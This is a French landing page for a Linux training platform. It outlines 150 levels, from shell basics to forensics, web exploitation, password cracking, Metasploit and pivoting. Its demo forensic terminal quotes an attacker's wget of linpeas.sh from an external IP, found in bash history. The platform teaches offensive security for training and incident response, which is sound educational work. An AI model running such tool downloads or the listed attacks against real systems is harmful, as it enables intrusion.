Plateforme d'entraînement Linux

Apprends Linux
comme un professionnel

150 niveaux progressifs — terminal, système, réseau, forensic, CTF. Tout dans le navigateur, vrai shell bash, pas de compte requis.

150
niveaux
20
scénarios
99+
commandes
0
installation

Parcours

15 chapitres, des bases au CTF

01–10Terminal & SSH
  • ls, cd, pwd, cat
  • grep, find, chmod
  • base64, SSH
  • Permissions
11–20Flux & Scripts
  • >, >>, |
  • wc, sort, uniq
  • Variables, wildcards
  • Scripts Bash
21–30Réseau & Crypto
  • sudo, SUID
  • Clés SSH
  • Hashing, sed, regex
  • CTF finale
31–40Système Linux
  • df, du, free, top
  • journalctl, systemctl
  • crontab, umask
  • Utilisateurs
41–50Réseau
  • ip, ss, dig
  • ping, traceroute
  • iptables, rsync
  • Tunnel SSH
51–60Forensic Linux
  • auth.log, stat
  • Timeline, lsof
  • Hash, persistance
  • Réponse IR
61–70Reconnaissance
  • nmap, dig
  • DNS, OSINT
  • Enumération web
  • Fingerprinting
71–80Hacking & PrivEsc
  • SUID, capabilities
  • Cron abuse
  • Pivoting
  • Persistence
81–90Bash Avancé
  • Boucles, fonctions
  • Arrays, regex
  • awk, sed avancés
  • trap, getopts
91–100CTF Challenges
  • Stéganographie
  • Encodages, hash
  • Analyse binaire
  • Docker escape
101–110Web Reconnaissance
  • Gobuster, ffuf
  • Headers HTTP
  • Nikto, Wapiti
  • Fingerprinting web
111–120Web Exploitation
  • SQLi, XSS
  • LFI/RFI
  • CSRF, SSRF
  • Injections
121–130Auth & Password Attacks
  • Hydra, Medusa
  • Hash cracking
  • Wordlists
  • Brute force
131–140Metasploit
  • msfconsole
  • Exploits, payloads
  • Meterpreter
  • Post-exploitation
141–150Pivoting
  • Tunnels SSH
  • Proxychains
  • Port forwarding
  • Lateral movement

Mode avancé

20 scénarios de mise en situation

Une fois les bases acquises, affronte des incidents réalistes : brute-force SSH, webshell, cartographie réseau, privilege escalation. Pas de commande unique — il faut raisonner et enchaîner.

  • Contexte détaillé fourni
  • Forensic, réseau, pentest, hacking
  • Validation par jalons
  • Badges et XP
Voir les scénarios →
forensic@edulinux:~$
$ grep 'Failed' auth.log | wc -l
847
$ grep 'Accepted' auth.log
Accepted password for admin from 185.220.101.5
$ cat bash_history | grep wget
wget http://185.220.101.5/tools/linpeas.sh
✓ Étape validée — connexion confirmée